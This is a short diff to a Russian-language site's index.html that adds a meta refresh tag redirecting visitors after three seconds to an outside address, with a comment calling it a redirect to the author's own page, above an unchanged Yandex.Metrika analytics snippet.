--- a/OZA/index.html
+++ b/OZA/index.html
@@ -4,6 +4,7 @@
 <html lang="ru">
 <head>
 <meta charset="UTF-8">
+	<meta http-equiv="refresh" content="3; url=http://mssg.gq"> <!-- Редирект на мою страницу -->
 <!-- Yandex.Metrika counter -->
 <script type="text/javascript" >
    (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
